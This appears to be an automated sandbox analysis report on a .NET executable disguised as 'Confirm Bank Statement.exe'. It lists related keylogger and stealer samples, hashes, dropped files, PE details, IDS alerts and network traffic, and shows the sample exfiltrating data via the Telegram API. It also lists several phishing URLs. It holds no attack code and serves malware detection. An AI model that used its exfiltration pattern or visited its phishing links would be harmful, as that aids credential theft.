                                                                                          PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            reallyfreegeoip.org50201668.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 104.21.64.1
                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 104.21.48.1
                                                                                            MB263350411AE_1.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 104.21.16.1
                                                                                            ABG Draft.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 104.21.64.1
                                                                                            RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 104.21.80.1
                                                                                            PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 104.21.16.1
                                                                                            tN8GsMV1le.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 104.21.32.1
                                                                                            slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 104.21.48.1
                                                                                            rOrders.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 104.21.32.1
                                                                                            MB263350411AE.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 104.21.112.1
                                                                                            api.telegram.orgq9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            12.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            ElixirInjector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                            • 149.154.167.220
                                                                                            QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            Remittance Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            checkip.dyndns.com50201668.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 193.122.130.0
                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 132.226.247.73
                                                                                            MB263350411AE_1.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 193.122.130.0
                                                                                            ABG Draft.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 158.101.44.242
                                                                                            RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 132.226.247.73
                                                                                            PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 132.226.8.169
                                                                                            tN8GsMV1le.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 132.226.8.169
                                                                                            slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 193.122.130.0
                                                                                            rOrders.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 132.226.247.73
                                                                                            MB263350411AE.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 193.122.130.0

                                                                                            ASNs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            TELEGRAMRUq9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            12.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            12.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            http://bu9.fysou.web.id/webs6/cx.aktifkn.fiturrGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.164.13
                                                                                            http://bu9.fysou.web.id/webs6/aktrfn.fitur.pylterGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.164.13
                                                                                            Handler.exeGet hashmaliciousDanaBot, VidarBrowse
                                                                                            • 149.154.167.99
                                                                                            sysadmin.exeGet hashmaliciousVidarBrowse
                                                                                            • 149.154.167.99
                                                                                            JUbmpeT.exeGet hashmaliciousVidarBrowse
                                                                                            • 149.154.167.99
                                                                                            UTMEMUSTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 132.226.247.73
                                                                                            RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 132.226.247.73
                                                                                            PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 132.226.8.169
                                                                                            tN8GsMV1le.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 132.226.8.169
                                                                                            rOrders.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 132.226.247.73
                                                                                            QUOTATION REQUIRED_Enatel s.r.l..bat.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 132.226.8.169
                                                                                            PDF-3093900299039 pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 132.226.8.169
                                                                                            QUOTATION#090125-ELITEMARINE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 132.226.247.73
                                                                                            Order_list.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 132.226.247.73
                                                                                            Receipt-2502-AJL2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 132.226.8.169
                                                                                            CLOUDFLARENETUS0dsIoO7xjt.docxGet hashmaliciousUnknownBrowse
                                                                                            • 172.65.251.78
                                                                                            http://wagestream.acemlnb.comGet hashmaliciousUnknownBrowse
                                                                                            • 104.20.0.15
                                                                                            Subscription_Renewal_Receipt_2025.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 104.18.95.41
                                                                                            Payment_243.jsGet hashmaliciousNetSupport RATBrowse
                                                                                            • 172.67.68.212
                                                                                            Payment_243.jsGet hashmaliciousNetSupport RATBrowse
                                                                                            • 104.26.0.231
                                                                                            http://vionicstore.shopGet hashmaliciousUnknownBrowse
                                                                                            • 104.18.73.116
                                                                                            http://yourexcellency.activehosted.comGet hashmaliciousUnknownBrowse
                                                                                            • 104.17.25.14
                                                                                            https://www.xrmtoolbox.com/Get hashmaliciousUnknownBrowse
                                                                                            • 172.67.197.240
                                                                                            mWAik6b.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                            • 172.67.150.129
                                                                                            https://mercedesinsua.com.ar/?infox=Ymxha2Uuc2lyZ29AY290ZXJyYS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                            • 188.114.96.3

                                                                                            JA3 Fingerprints

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            54328bd36c14bd82ddaa0c04b25ed9ad50201668.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 104.21.64.1
                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 104.21.64.1
                                                                                            MB263350411AE_1.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 104.21.64.1
                                                                                            ABG Draft.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 104.21.64.1
                                                                                            RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 104.21.64.1
                                                                                            PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 104.21.64.1
                                                                                            tN8GsMV1le.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 104.21.64.1
                                                                                            slime crypted.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 104.21.64.1
                                                                                            rOrders.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 104.21.64.1
                                                                                            MB263350411AE.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                            • 104.21.64.1
                                                                                            3b5074b1b5d032e5620f69f9f700ff0eSubscription_Renewal_Receipt_2025.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 149.154.167.220
                                                                                            http://vionicstore.shopGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            https://www.xrmtoolbox.com/Get hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            TiOWA908TP.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fmessagupdates.courtfilepro.com%2FVTtMaGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 149.154.167.220
                                                                                            TiOWA908TP.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            50201668.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 149.154.167.220

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Confirm Bank Statement.exe.log

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\Confirm Bank Statement.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1216
                                                                                            Entropy (8bit):5.34331486778365
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                            Malicious:true
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1172
                                                                                            Entropy (8bit):5.357042452875322
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:3CytZWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:yyjWSU4y4RQmFoUeWmfmZ9tK8NDE
                                                                                            MD5:475D428E7231D005EEA5DB556DBED03F
                                                                                            SHA1:3D603ED4280E0017D1BEB124D68183F8283B5C22
                                                                                            SHA-256:1314488A930843A7E1A003F2E7C1D883DB44ADEC26AC1CA096FE8DC1B4B180F5
                                                                                            SHA-512:7181BDCE6DA8DA8AFD3A973BB2B0BA470468EFF32FFB338DB2662FEFA1A7848ACD87C319706B95401EA18DC873CA098DC722EA6F8B2FD04F1AABD2AEBEA97CF9
                                                                                            Malicious:false
                                                                                            Reputation:moderate, very likely benign file
                                                                                            Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bvvfwxyg.1ed.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gqveta0f.go4.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iq22oikl.yd0.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lp00fqfj.vu1.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Entropy (8bit):7.6207958727249006
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            File name:Confirm Bank Statement.exe
                                                                                            File size:578'560 bytes
                                                                                            MD5:d16a155d98d41cf4109fc2ebe34c0ab4
                                                                                            SHA1:93176aab1ccb1db112204c4860405bb9bffa1c9b
                                                                                            SHA256:e5eab0d46a0a0500431f1ef78dd03c8dc17b97794f558624dfa7a567e24245e1
                                                                                            SHA512:2aa7fe4a1c2c06dcca016cd3894d2336631ceb4bb1a829b63bd3a07d2cab5262e24ab52508c7ee34f977c2e35966a33dc082b1bd25c543e0008a7c15080cb864
                                                                                            SSDEEP:12288:AfyYRxA4Y5lyA/BxSPCrAlaYf43LVB5g1FzgL8LXxmjaY6nUreuFwWR:qRkAsgI/5QRgILXM29uiW
                                                                                            TLSH:93C4E054365AE803C0A20EB01922D3F957789E9DE921D3438FE93EFF7DB9B562540392
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0......&......:.... ........@.. .......................@............@................................

                                                                                            File Icon

                                                                                            Icon Hash:f0aea8aaaa8ee80f

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x48cb3a
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x6785CCBC [Tue Jan 14 02:32:28 2025 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            jmp dword ptr [00402000h]
                                                                                            and dword ptr [eax], eax
                                                                                            inc eax
                                                                                            add byte ptr [ebx], ah
                                                                                            add byte ptr [eax+eax], ah
                                                                                            and eax, 26005E00h
                                                                                            add byte ptr [edx], ch
                                                                                            add byte ptr [eax], ch
                                                                                            add byte ptr [ecx], ch
                                                                                            add byte ptr [edi], bh
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [edx+003E9999h], bl
                                                                                            add byte ptr [eax], al
                                                                                            aas
                                                                                            int CCh
                                                                                            dec esp
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8cae80x4f.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x8e0000x22d4.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x920000xc.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x20000x8ab680x8ac001ff71d1df20cf885d3f1998cff38a5d6False0.8904191300675676data7.627355501282747IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rsrc0x8e0000x22d40x24005468a5643056f6bfa0ffb3e3c8442132False0.8772786458333334data7.375363829856805IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0x920000xc0x200fe880a5fee753de0eb99881a72f7ab1dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_ICON0x8e0c80x1e50PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9755154639175257
                                                                                            RT_GROUP_ICON0x8ff280x14data1.05
                                                                                            RT_VERSION0x8ff4c0x384data0.43222222222222223

                                                                                            Imports

                                                                                            DLLImport
                                                                                            mscoree.dll_CorExeMain

                                                                                            Network Behavior

                                                                                            Suricata IDS Alerts

                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2025-01-14T16:43:28.173614+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749701132.226.8.16980TCP
                                                                                            2025-01-14T16:43:34.454787+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749701132.226.8.16980TCP
                                                                                            2025-01-14T16:43:35.111519+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749729149.154.167.220443TCP
                                                                                            2025-01-14T16:43:35.509681+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749729149.154.167.220443TCP

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Jan 14, 2025 16:43:23.082989931 CET4970180192.168.2.7132.226.8.169
                                                                                            Jan 14, 2025 16:43:23.087873936 CET8049701132.226.8.169192.168.2.7
                                                                                            Jan 14, 2025 16:43:23.087941885 CET4970180192.168.2.7132.226.8.169
                                                                                            Jan 14, 2025 16:43:23.088149071 CET4970180192.168.2.7132.226.8.169
                                                                                            Jan 14, 2025 16:43:23.092952967 CET8049701132.226.8.169192.168.2.7
                                                                                            Jan 14, 2025 16:43:25.513681889 CET8049701132.226.8.169192.168.2.7
                                                                                            Jan 14, 2025 16:43:25.514343023 CET8049701132.226.8.169192.168.2.7
                                                                                            Jan 14, 2025 16:43:25.514489889 CET4970180192.168.2.7132.226.8.169
                                                                                            Jan 14, 2025 16:43:25.518198013 CET4970180192.168.2.7132.226.8.169
